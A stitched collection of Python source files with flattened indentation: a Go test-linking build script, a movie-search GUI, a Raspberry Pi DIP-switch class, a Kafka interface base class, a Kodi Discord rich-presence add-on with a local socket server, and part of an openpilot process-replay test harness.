for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
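# Added example (hypothetical test names): with skip_tests=['TestFoo', 'TestBar*'] the helper
# above removes the exact name 'TestFoo' and any test matching the glob 'TestBar*'
# (e.g. 'TestBarBaz'), while every other test name is kept.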
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env).decode('UTF-8') or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env).decode('UTF-8') or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
if compare_versions('1.18', args.goversion) < 0:
kinds = ['Test', 'Benchmark', 'Example']
else:
kinds = ['Test', 'Benchmark', 'FuzzTarget', 'Example']
var_names = []
for kind in kinds:
var_name = '{}s'.format(kind.lower())
var_names.append(var_name)
lines.append('var {} = []testing.Internal{}{{'.format(var_name, kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{{}}, {})'.format(', '.join(var_names)),
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
if xtest_lib_args is not None:
xtest_lib_args.embed = args.embed_xtest if args.embed_xtest else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.embed = None
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
        # of mangling doesn't really look good to me, so we leave it
        # for the pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
    if six.PY2:
        # reload()/setdefaultencoding and the codecs writer wrappers are only
        # needed (and only available) on Python 2
        reload(sys)  # noqa: F821
        sys.setdefaultencoding('utf-8')
        sys.stdout = codecs.getwriter('utf8')(sys.stdout)
        sys.stderr = codecs.getwriter('utf8')(sys.stderr)
args = pcf.get_args(sys.argv[1:])
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64', 'arm64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86', 'arm64'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++vendor-prefix', nargs='?', default=vendor_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
parser.add_argument('++embed', action='append', nargs='*')
parser.add_argument('++embed_xtest', action='append', nargs='*')
args = parser.parse_args(args)
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vendor_prefix = args.vendor_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
Search.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import webbrowser
from Da import ResZmz
from Da import ResVhao
from View import ResultView
import urllib
class Search :
def __init__ (self, master) :
self.master = master
self.ResWindow = ResultView.GUI(self.master)
def showResult (self, key) :
searchKey = key.get()
self.ResWindow.showList(searchKey)
self.ResWindow.listRst = ''
data = ''
self.ResWindow.getDetail = lambda data = data : self.__searchMovDetails(data)
threading.Thread(target = lambda key = searchKey : self.__searchMov(key)).start()
self.ResWindow.updateList()
def __searchMov (self, key) :
        # Run the search through both sources (primary plus lower-quality fallback)
self.mainSearcher = ResZmz.Searcher()
self.subSearcher = ResVhao.Searcher()
mainResult = self.mainSearcher.find(key)
subResult = self.subSearcher.find(key)
        mainResult.append({'title':'\n-------- Lower-quality results below: --------\n','url':''})
mainResult.extend(subResult)
self.ResWindow.listRst = mainResult
def __searchMovDetails (self, data):
self.ResWindow.resRst = ''
self.ResWindow.showRes()
        # Start a separate thread for the detail lookup
threading.Thread(target = lambda data = data : self.__getDetails(data)).start()
self.ResWindow.updateRes()
def __getDetails (self, data) :
if data['url'] != '' :
if data['source'] == 'zmz' :
result = self.mainSearcher.getLink(data['url'])
else :
result = self.subSearcher.getLink(data['url'])
self.ResWindow.resRst = result
|
dip_switch_2bit.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import RPi.GPIO as GPIO
import time
from threading import Thread
class DipSwitch2Bit(object):
'''
Dip switch (2bit) class
'''
__pins = []
__real_true = GPIO.HIGH
__status = []
__observers = []
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the dip switch
:param pin: pin numbers in array
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
for p in pins:
self.__status.append(not real_true)
if self.__real_true:
self.__status[0] = GPIO.input(self.__pins[0])
self.__status[1] = GPIO.input(self.__pins[1])
else:
self.__status[0] = not GPIO.input(self.__pins[0])
self.__status[1] = not GPIO.input(self.__pins[1])
GPIO.add_event_detect(self.__pins[0], GPIO.BOTH, callback = self.make_event, bouncetime = 50)
GPIO.add_event_detect(self.__pins[1], GPIO.BOTH, callback = self.make_event, bouncetime = 50)
try:
t1 = Thread(target = self.watching)
t1.setDaemon(True)
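            # Note: this polling thread is created but never started here; status updates are
            # driven by the GPIO edge callbacks registered above. Call t1.start() if the
            # polling fallback in watching() is also wanted.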
except:
print("Error: Unable to start thread by DipSwitch")
    # Status.
@property
def is_on(self):
'''
Get the status of each bit
:return: the status array
'''
return self.__status
#Events
def register(self, observer):
if observer not in self.__observers:
self.__observers.append(observer)
def deregister(self, observer):
if observer in self.__observers:
self.__observers.remove(observer)
def notify_observers(self):
for o in self.__observers:
#o.update(self.__status)
o.on_dip_switch_2bit_status_changed(self.__status)
def status_changed(self):
self.notify_observers()
def make_event(self, channel):
if self.__real_true:
if GPIO.input(self.__pins[0]) != self.__status[0]:
self.__status[0] = GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) != self.__status[1]:
self.__status[1] = GPIO.input(self.__pins[1])
self.status_changed()
else:
if GPIO.input(self.__pins[0]) == self.__status[0]:
self.__status[0] = not GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) == self.__status[1]:
self.__status[1] = not GPIO.input(self.__pins[1])
self.status_changed()
def watching(self):
if self.__real_true:
while True:
if GPIO.input(self.__pins[0]) != self.__status[0]:
self.__status[0] = GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) != self.__status[1]:
self.__status[1] = GPIO.input(self.__pins[1])
self.status_changed()
time.sleep(0.05)
else:
while True:
if GPIO.input(self.__pins[0]) == self.__status[0]:
self.__status[0] = not GPIO.input(self.__pins[0])
self.status_changed()
if GPIO.input(self.__pins[1]) == self.__status[1]:
self.__status[1] = not GPIO.input(self.__pins[1])
self.status_changed()
time.sleep(0.05)
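# Illustrative usage sketch (added; not part of the original library). An observer only needs
# the callback used by notify_observers above; the BCM pin numbers are assumptions.
#
# class MyObserver(object):
#     def on_dip_switch_2bit_status_changed(self, status):
#         print('dip switch status changed:', status)
#
# GPIO.setmode(GPIO.BCM)
# GPIO.setup([17, 18], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# switch = DipSwitch2Bit([17, 18], real_true=GPIO.HIGH)
# switch.register(MyObserver())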
|
kafka_interface.py
|
import asyncio
import threading
from abc import ABC, abstractmethod
from copy import copy
class KafkaInterface(ABC):
def __init__(self):
self._loop = asyncio.get_event_loop()
self._cancelled = False
self._poll_thread = threading.Thread(target=self._poll_loop)
self._is_connected = False
self._lock = threading.Lock()
# Call self._poll_thread.start() in child constructor
@abstractmethod
def _poll_loop(self):
pass
@property
def connected(self):
with self._lock:
return_status = copy(self._is_connected)
return return_status
@connected.setter
def connected(self, is_connected):
with self._lock:
self._is_connected = is_connected
def close(self):
self._cancelled = True
self._poll_thread.join()
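# Minimal sketch of a concrete subclass (added for illustration; the confluent_kafka client
# and the topic name are assumptions, not part of this module):
#
# from confluent_kafka import Consumer
#
# class ExampleKafkaConsumer(KafkaInterface):
#     def __init__(self, config):
#         super().__init__()
#         self._consumer = Consumer(config)
#         self._consumer.subscribe(["example_topic"])
#         self._poll_thread.start()  # as required by the base-class comment above
#
#     def _poll_loop(self):
#         self.connected = True
#         while not self._cancelled:
#             msg = self._consumer.poll(0.5)
#             if msg is not None and msg.error() is None:
#                 print(msg.value())
#         self._consumer.close()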
|
default.py
|
import xbmc, xbmcaddon
import json
import time
import re
import requests
#SERVER CUSTOM SCRIPT
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = "" #Host IP example 192.168.0.22
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
running = False
def log(msg):
xbmc.log("[Discord RP] " + msg)
DISCORD_CLIENT_ID = '0'
CLIENT_ID = ['544620244014989312',
'570950300446359552']
def getShowImage(showTitle):
if showTitle in AVAIABLE_IMAGES:
return AVAIABLE_IMAGES[showTitle]
return "default"
def removeKodiTags(text):
log("Removing tags for: " + text)
validTags = ["I", "B", "LIGHT", "UPPERCASE", "LOWERCASE", "CAPITALIZE", "COLOR"]
for tag in validTags:
r = re.compile("\[\s*/?\s*"+tag+"\s*?\]")
text = r.sub("", text)
r = re.compile("\[\s*/?\s*CR\s*?\]")
text = r.sub(" ", text)
r = re.compile("\[\s*/?\s*COLOR\s*?.*?\]")
text = r.sub("", text)
log("Removed tags. Result: " + text)
return text
class ServiceRichPresence:
def __init__(self):
self.presence = None
self.settings = {}
self.paused = True
self.connected = False
self.updateSettings()
self.clientId = self.settings['client_id']
def setPauseState(self, state):
self.paused = state
def updateSettings(self):
self.settings = {}
self.settings['large_text'] = "Kodi"
addon = xbmcaddon.Addon()
self.settings['episode_state'] = addon.getSettingInt('episode_state')
self.settings['episode_details'] = addon.getSettingInt('episode_details')
self.settings['movie_state'] = addon.getSettingInt('movie_state')
self.settings['movie_details'] = addon.getSettingInt('movie_details')
self.settings['inmenu'] = addon.getSettingBool('inmenu')
self.settings['client_id'] = addon.getSettingInt('client_id')
# get setting
log(str(self.settings))
def gatherData(self):
player = xbmc.Player()
if player.isPlayingVideo():
return player.getVideoInfoTag()
return None
def craftNoVideoState(self, data):
if self.settings['inmenu']:
activity = {'assets' : {'large_image' : 'default',
'large_text' : self.settings['large_text']},
'state' : (self.settings['inmenu'] and 'In menu' or '')
}
return activity
else:
return None
def getEpisodeState(self, data):
if self.settings['episode_state'] == 0:
return '{}x{:02} {}'.format(data.getSeason(),data.getEpisode(),removeKodiTags(data.getTitle()))
if self.settings['episode_state'] == 1:
return data.getTVShowTitle()
if self.settings['episode_state'] == 2:
return data.getGenre()
return None
def getEpisodeDetails(self, data):
if self.settings['episode_details'] == 0:
return data.getTVShowTitle()
if self.settings['episode_details'] == 1:
return '{}x{:02} {}'.format(data.getSeason(),data.getEpisode(),removeKodiTags(data.getTitle()))
if self.settings['episode_details'] == 2:
return data.getGenre()
return None
def craftEpisodeState(self, data):
activity = {}
activity['assets'] = {'large_image' : getShowImage(data.getTVShowTitle()),
'large_text' : data.getTVShowTitle()}
state = self.getEpisodeState(data)
if state:
activity['state'] = state
details = self.getEpisodeDetails(data)
if details:
activity['details'] = details
return activity
def getMovieState(self, data):
if self.settings['movie_state'] == 0:
return data.getGenre()
if self.settings['movie_state'] == 1:
return removeKodiTags(data.getTitle())
return None
def getMovieDetails(self, data):
if self.settings['movie_details'] == 0:
return removeKodiTags(data.getTitle())
if self.settings['movie_details'] == 1:
return data.getGenre()
return None
def craftMovieState(self, data):
activity = {}
activity['assets'] = {'large_image' : 'default',
'large_text' : removeKodiTags(data.getTitle())}
state = self.getMovieState(data)
if state:
activity['state'] = state
details = self.getMovieDetails(data)
if details:
activity['details'] = details
return activity
def craftVideoState(self, data):
activity = {}
title = data.getTitle() or data.getTagLine() or data.getFile()
title = removeKodiTags(title)
activity['assets'] = {'large_image' : 'default',
'large_text' : title }
activity['details'] = title
return activity
def mainLoop(self):
while True:
monitor.waitForAbort(5)
if monitor.abortRequested():
break
self.updatePresence()
log("Abort called. Exiting...")
if self.connected:
try:
global running,client
running = False
if client:
client.close()
server.close()
except IOError as e:
self.connected = False
log("Error closing connection: " + str(e))
def updatePresence(self):
self.connected = True
if self.connected:
data = self.gatherData()
activity = None
#activity['assets'] = {'large_image' : 'default',
# 'large_text' : self.settings['large_text']}
if not data:
# no video playing
log("Setting default")
if self.settings['inmenu']:
activity = self.craftNoVideoState(data)
else:
if data.getMediaType() == 'episode':
activity = self.craftEpisodeState(data)
elif data.getMediaType() == 'movie':
activity = self.craftMovieState(data)
elif data.getMediaType() == 'video':
activity = self.craftVideoState(data)
else:
activity = self.craftVideoState(data)
log("Unsupported media type: "+str(data.getMediaType()))
log("Using workaround")
if self.paused:
activity['assets']['small_image'] = 'paused'
# Works for
# xx:xx/xx:xx
# xx:xx/xx:xx:xx
# xx:xx:xx/xx:xx:xx
currentTime = player.getTime()
hours = int(currentTime/3600)
minutes = int(currentTime/60) - hours*60
seconds = int(currentTime) - minutes*60 - hours*3600
fullTime = player.getTotalTime()
fhours = int(fullTime/3600)
fminutes = int(fullTime/60) - fhours*60
fseconds = int(fullTime) - fminutes*60 - fhours*3600
activity['assets']['small_text'] = "{}{:02}:{:02}/{}{:02}:{:02}".format('{}:'.format(hours) if hours>0 else '',
minutes,
seconds,
'{}:'.format(fhours) if fhours>0 else '',
fminutes,
fseconds
)
else:
currentTime = player.getTime()
fullTime = player.getTotalTime()
remainingTime = fullTime - currentTime
activity['timestamps'] = {'end' : int(time.time()+remainingTime)}
            if activity is None:
try:
self.presence.clear_activity()
except Exception as e:
log("Error while clearing: " + str(e))
else:
if self.settings['client_id'] != self.clientId:
pass
else:
log("Activity set: " + str(activity))
global client
try:
if client:
client.sendall(bytes(str(activity),'utf-8'))
except Exception:
client = None
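# Illustrative only (not used by the service): a typical activity payload built by
# craftEpisodeState() plus the pause handling in updatePresence() above, assuming an
# episode paused at 12:34 of 41:20. All values here are made up for the example.
#
#   {'assets': {'large_image': '<show artwork url>', 'large_text': 'Some Show',
#               'small_image': 'paused', 'small_text': '12:34/41:20'},
#    'state': '1x05 Pilot',
#    'details': 'Some Show'}
#
# When playback is not paused, the small image/text are omitted and a
# {'timestamps': {'end': <unix time>}} entry is added instead.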
class MyPlayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
def onPlayBackPaused(self):
drp.setPauseState(True)
drp.updatePresence()
def onAVChange(self):
drp.updatePresence()
def onAVStarted(self):
drp.setPauseState(False)
drp.updatePresence()
def onPlayBackEnded(self):
drp.setPauseState(True)
drp.updatePresence()
def onPlayBackResumed(self):
drp.setPauseState(False)
drp.updatePresence()
def onPlayBackError(self):
drp.setPauseState(True)
drp.updatePresence()
def onPlayBackSeek(self, *args):
drp.updatePresence()
def onPlayBackSeekChapter(self, *args):
drp.updatePresence()
def onPlayBackStarted(self):
drp.setPauseState(False)
# media might not be loaded
drp.updatePresence()
def onPlayBackStopped(self):
drp.setPauseState(True)
drp.updatePresence()
class MyMonitor(xbmc.Monitor):
def __init__(self):
xbmc.Monitor.__init__(self)
log("Monitor initialized")
def onSettingsChanged(self):
drp.updateSettings()
drp.updatePresence()
AVAIABLE_IMAGES = []
try:
AVAIABLE_IMAGES = json.loads(requests.get("https://hiumee.github.io/kodi/custom.json", timeout=10).text)
except Exception:
pass
client = None
def handle_client(conn, addr):
try:
connected = True
while connected:
msg = conn.recv(1024).decode(FORMAT)
if not msg or msg == DISCONNECT_MESSAGE:  # an empty read means the peer closed the socket
connected = False
print(f"[{addr}] {msg}")
conn.close()
global client
client = None
except Exception:
pass
def start():
global running
running = True
server.listen()
xbmc.log(f"[LISTENING] Server is listening on {SERVER}")
global client
while running:
try:
conn, addr = server.accept()
client = conn
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
except Exception:
server.close()
server_Thread = threading.Thread(target=start, args=())
server_Thread.start()
monitor = MyMonitor()
player = MyPlayer()
drp = ServiceRichPresence()
drp.updatePresence()
drp.mainLoop()
|
process_replay.py
|
#!/usr/bin/env python3
import os
import sys
import threading
import importlib
if "CI" in os.environ:
tqdm = lambda x: x
else:
from tqdm import tqdm
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.current_thread().name == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
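# Illustrative only: the two Events above form a rendezvous, so with wait=True a send()
# from the test harness does not return until the process under test has entered
# receive(), and receive() blocks until send() has supplied data. A minimal sketch:
#
#   sock = FakeSocket()
#   threading.Thread(target=lambda: print(sock.receive()), daemon=True).start()
#   sock.send(b"dat")  # unblocks once the reader thread is waiting inside receive()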
class DumbSocket:
def __init__(self, s=None):
if s is not None:
dat = messaging.new_message()
dat.init(s)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services):
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
data = messaging.new_message()
try:
data.init(s)
except Exception:
data.init(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = ["liveCalibration"] if (fsm.frame + 1) % 5 == 0 else []
return recv_socks, True
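# Illustrative only: with the 1-in-5 rule above (frames counted from 0), a
# liveCalibration message is expected on frames 4, 9, 14, ...:
#
#   [f for f in range(15) if (f + 1) % 5 == 0]  # -> [4, 9, 14]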
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "plan": [], "pathPlan": [], "gpsLocation": [],
"model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("controlsState.startMonoTime", 0), ("controlsState.cumLagMs", 0)],
init_callback=fingerprint,
should_recv_callback=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
